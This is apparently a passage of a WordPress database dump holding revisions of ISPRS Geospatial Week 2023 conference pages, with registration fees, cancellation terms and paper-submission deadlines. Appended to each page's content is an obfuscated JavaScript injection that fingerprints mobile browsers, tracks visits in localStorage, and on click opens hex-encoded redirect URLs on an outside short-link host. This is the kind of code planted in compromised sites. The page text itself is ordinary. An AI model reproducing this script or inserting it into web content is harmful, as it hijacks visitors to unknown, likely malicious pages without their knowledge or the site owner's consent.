_0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2022-11-25 22:07:41','2022-11-25 22:07:41','',2654,'https://gsw2023.com/?p=3366',0,'revision','',0),
(3367,1,'2022-11-25 22:21:50','2022-11-25 22:21:50','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h1 style=\"text-align: justify; color: red;\"><strong><span style=\"font-size: 22px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h1>\n<div class=\"three_quarter first\">\n<section class=\"clear\">\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\n</section>\n</div>\n<p>[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\"]</p>\n<h2>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</h2>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\">o Standard and student / senior (over 65) registration fees include:</h5>\n<ul class=\"nospace\">\n<li>\n<h6>Entry to all sessions/workshops;</h6>\n</li>\n<li>\n<h6>Entry to the Exhibition;</h6>\n</li>\n<li>\n<h6>Copy of Final Programme;</h6>\n</li>\n<li>\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\n</li>\n<li>\n<h6>Lunches;</h6>\n</li>\n<li>\n<h6>Attendance at Welcome Reception;</h6>\n</li>\n<li>\n<h6>Attendance at Exhibitors Reception;</h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\">o Accompanying person fee includes:</h5>\n<ul>\n<li>\n<h6>Entry to Opening Session;</h6>\n</li>\n<li>\n<h6>Attendance at Welcome Reception;</h6>\n</li>\n<li>\n<h6>Attendance at Exhibitors Reception;</h6>\n</li>\n<li>\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\">o Cancellation policy:</h5>\n<ul>\n<li>\n<h6>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</h6>\n</li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\">-Two Social Dinners Will Be Organized On Tuesday And Thursday.</h5>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-11-25 22:21:50','2022-11-25 22:21:50','',2638,'https://gsw2023.com/?p=3367',0,'revision','',0),
(3368,1,'2022-11-25 22:24:38','2022-11-25 22:24:38','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<div class=\"three_quarter first\">\n<ul class=\"nospace\">\n<li style=\"text-align: justify;\">\n<h5><strong>The ISPRS Geospatial Week 2023 will be opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2019/\" target=\"_blank\" rel=\"noopener\">ConfTool website of the Geospatial Week</a></strong></h5>\n<h5><strong>, authors will be able to submit either a full paper or an extended abstract to one of the following workshops/themes:</strong></h5>\n</li>\n</ul>\n<div class=\"gap-10\"></div>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>\n<h6><strong>-Unmanned Aerial Vehicles in Geomatics (UAV-g)</strong></h6>\n</li>\n<li>\n<h6><strong>-Laser scanning</strong></h6>\n</li>\n<li>\n<h6><strong>-Digital Transformation</strong></h6>\n</li>\n<li>\n<h6><strong>-Location Based Services (LBS)</strong></h6>\n</li>\n<li>\n<h6><strong>-Smartphones and wearable devices for LBS</strong></h6>\n</li>\n<li>\n<h6><strong>-Sensors for smart and sustainable cities</strong></h6>\n</li>\n<li>\n<h6><strong>-3D Mobile Mapping and GIS Integration</strong></h6>\n</li>\n<li>\n<h6><strong>-Indoor Mobile Mapping</strong></h6>\n</li>\n<li>\n<h6><strong>-LIDAR and SAR Mapping Systems</strong></h6>\n</li>\n<li>\n<h6><strong>-Mobile Mapping Applications</strong></h6>\n</li>\n<li>\n<h6><strong>-Data Fusion of multi-platform Mobile Mapping Technology</strong></h6>\n</li>\n</ul>\n</li>\n</ul>\n<p>&nbsp;</p>\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract author notification: May 2023</strong></li>\n<li><strong>Full paper Author notification: May 2023</strong></li>\n<li><strong>Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 